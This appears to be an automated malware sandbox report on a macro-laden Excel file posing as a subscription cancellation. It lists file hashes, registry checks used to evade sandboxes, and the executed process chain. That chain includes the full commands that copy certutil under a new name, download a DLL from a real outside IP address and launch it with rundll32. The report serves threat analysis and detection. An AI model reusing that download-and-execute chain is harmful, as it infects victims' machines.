cancel_sub_VCP1234567890123.xlsb
cancel_sub_VCP1234567890123.xlsb
123KB
10-06-2021 19:17
9e1ee4a42c381eabcf2cde38a1aae7c9
015bb306d9e54001d433b3ac2e7212b864f54ae2
fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3
Filter: none
-
Process spawned unexpected child processcmd.execmd.exe
Description
This typically indicates the parent process was compromised via an exploit or macro.
Reported IOCs
description pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4268 4440 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1864 4440 cmd.exe EXCEL.EXE -
Executes dropped EXETTObk2.exe
Reported IOCs
pid process 692 TTObk2.exe -
Checks processor information in registryEXCEL.EXE
Description
Processor information is often read in order to detect sandboxing environments.
TTPs
Reported IOCs
description ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registryEXCEL.EXE
TTPs
Reported IOCs
description ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListenerEXCEL.EXE
Reported IOCs
pid process 4440 EXCEL.EXE -
Suspicious use of SetWindowsHookExEXCEL.EXE
Reported IOCs
pid process 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE 4440 EXCEL.EXE -
Suspicious use of WriteProcessMemoryEXCEL.EXEcmd.exe
Reported IOCs
description pid process target process PID 4440 wrote to memory of 4268 4440 EXCEL.EXE cmd.exe PID 4440 wrote to memory of 4268 4440 EXCEL.EXE cmd.exe PID 4440 wrote to memory of 692 4440 EXCEL.EXE TTObk2.exe PID 4440 wrote to memory of 692 4440 EXCEL.EXE TTObk2.exe PID 4440 wrote to memory of 1864 4440 EXCEL.EXE cmd.exe PID 4440 wrote to memory of 1864 4440 EXCEL.EXE cmd.exe PID 1864 wrote to memory of 2128 1864 cmd.exe rundll32.exe PID 1864 wrote to memory of 2128 1864 cmd.exe rundll32.exe
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb"Checks processor information in registryEnumerates system info in registrySuspicious behavior: AddClipboardFormatListenerSuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exeProcess spawned unexpected child process
-
C:\programdata\TTObk2\TTObk2.exe"C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dllExecutes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartWProcess spawned unexpected child processSuspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
-
C:\ProgramData\TTObk2\TTObk2.dll
MD5336d5ebc5436534e61d16e63ddfca327
SHA13bc15c8aae3e4124dd409035f32ea2fd6835efc9
SHA2563973e022e93220f9212c18d0d0c543ae7c309e46640da93a4a0314de999f5112
SHA5127c0b0d99a6e4c33cda0f6f63547f878f4dd9f486dfe5d0446ce004b1c0ff28f191ff86f5d5933d3614cceee6fbbdc17e658881d3a164dfa5d6f4c699b2126e3d
-
C:\ProgramData\TTObk2\TTObk2.exe
MD5056c7d065f4622da9cc2848f47e2bae2
SHA16c6f18b0ec53dc63488961c4240ec584ac71c25f
SHA256e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
SHA512db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5
-
C:\programdata\TTObk2\TTObk2.exe
MD5056c7d065f4622da9cc2848f47e2bae2
SHA16c6f18b0ec53dc63488961c4240ec584ac71c25f
SHA256e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
SHA512db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5
-
memory/692-181-0x0000000000000000-mapping.dmp
-
memory/1864-183-0x0000000000000000-mapping.dmp
-
memory/2128-184-0x0000000000000000-mapping.dmp
-
memory/4268-179-0x0000000000000000-mapping.dmp
-
memory/4440-123-0x00007FF9D3020000-0x00007FF9D4F15000-memory.dmp
-
memory/4440-122-0x00007FF9D4F20000-0x00007FF9D600E000-memory.dmp
-
memory/4440-121-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-118-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-117-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-116-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-115-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
-
memory/4440-114-0x00007FF66AA70000-0x00007FF66E026000-memory.dmp